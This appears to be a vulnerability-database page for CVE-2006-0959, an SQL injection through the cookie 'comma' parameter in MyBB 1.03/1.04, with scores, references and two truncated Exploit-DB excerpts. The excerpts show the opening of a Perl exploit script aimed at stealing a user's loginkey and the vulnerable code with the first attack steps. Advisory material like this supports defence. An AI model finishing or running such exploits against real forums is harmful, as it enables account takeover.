CVE-2006-0959
published 2006-03-02CVE-2006-0959: SQL injection vulnerability in misc.php in MyBulletinBoard (MyBB) 1.03, when register_globals is enabled, allows remote attackers to execute arbitrary SQL…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.74%
88.5th percentile
SQL injection vulnerability in misc.php in MyBulletinBoard (MyBB) 1.03, when register_globals is enabled, allows remote attackers to execute arbitrary SQL commands by setting the comma variable value via the comma parameter in a cookie. NOTE: 1.04 has also been reported to be affected.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mybulletinboard | mybulletinboard | — | — |
| mybulletinboard | mybulletinboard | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MyBulletinBoard (MyBB) 1.04 - 'misc.php' SQL Injection (2)
exploitdb·2006-03-03
CVE-2006-0959 MyBulletinBoard (MyBB) 1.04 - 'misc.php' SQL Injection (2)
MyBulletinBoard (MyBB) 1.04 - 'misc.php' SQL Injection (2)
---
#!/usr/bin/perl -w
# MyBB :)
#
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
# DONT FORGET TO DO YOUR CONFIG !!
use IO::Socket;
##-- Start --#
$host = "127.0.0.1";
$path = "/mybb3/";
$userid = 1;
$mycookie = "mybbuser=1_xommhw5h9kZZGSFUppacVfacykK1gnd84PLehjlhTGC1ZiQkXr;";
##-- _END_ --##
# $host :-
# The Host Name Without http:// | exm. www.vic.com
#
# $path :-
# MyBB Dir On Server | exm. /mybb/
#
# $userid :-
# The ID Of The User U Wanna To Get His Loginkey
#
# $cookie :-
# You Must Register Username And Get YourCookies ( mybb_user ) Then But it Like This
#
# $cookie = "mybbuser=[YourID]_[YourLoginkey];";
$sock = IO::Socket::INET->new (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp"
) or d
Exploit-DB
MyBulletinBoard (MyBB) 1.03 - 'misc.php' SQL Injection
exploitdb·2006-02-28
CVE-2006-0959 MyBulletinBoard (MyBB) 1.03 - 'misc.php' SQL Injection
MyBulletinBoard (MyBB) 1.03 - 'misc.php' SQL Injection
---
MyBB New SQL Injection
D3vil-0x1
Milw0rm ID :-
http://www.milw0rm.com/auth.php?id=1320
The Inf.File :-
misc.php
Linez :-
[code]
$buddies = $mybb->user['buddylist'];
$namesarray = explode(",",$buddies);
if(is_array($namesarray))
{
while(list($key, $buddyid) = each($namesarray))
{
$sql .= "$comma'$buddyid'"; settings['wolcutoff'];
$query = $db->query("SELECT u.*, g.canusepms FROM ".TABLE_PREFIX."users u LEFT JOIN ".TABLE_PREFIX."usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN ($sql)");
[/code]
From 255 to 265
The GLOBALS unset function .. do not unset $_COOKIES ..
then u can start attacking any var by cookies :)
Tested MyBB 1.3 .. Register_Globals = On
Explorer Exploit :-
1- Login by any username ..
2- Create ne
No writeups or analysis indexed.
http://secunia.com/advisories/19061http://securityreason.com/securityalert/512http://www.osvdb.org/23554http://www.securityfocus.com/archive/1/426320/100/0/threadedhttp://www.securityfocus.com/archive/1/426653/100/0/threadedhttp://www.securityfocus.com/bid/16631http://www.vupen.com/english/advisories/2006/0774https://exchange.xforce.ibmcloud.com/vulnerabilities/24953https://www.exploit-db.com/exploits/1539http://secunia.com/advisories/19061http://securityreason.com/securityalert/512http://www.osvdb.org/23554http://www.securityfocus.com/archive/1/426320/100/0/threadedhttp://www.securityfocus.com/archive/1/426653/100/0/threadedhttp://www.securityfocus.com/bid/16631http://www.vupen.com/english/advisories/2006/0774https://exchange.xforce.ibmcloud.com/vulnerabilities/24953https://www.exploit-db.com/exploits/1539
2006-03-02
Published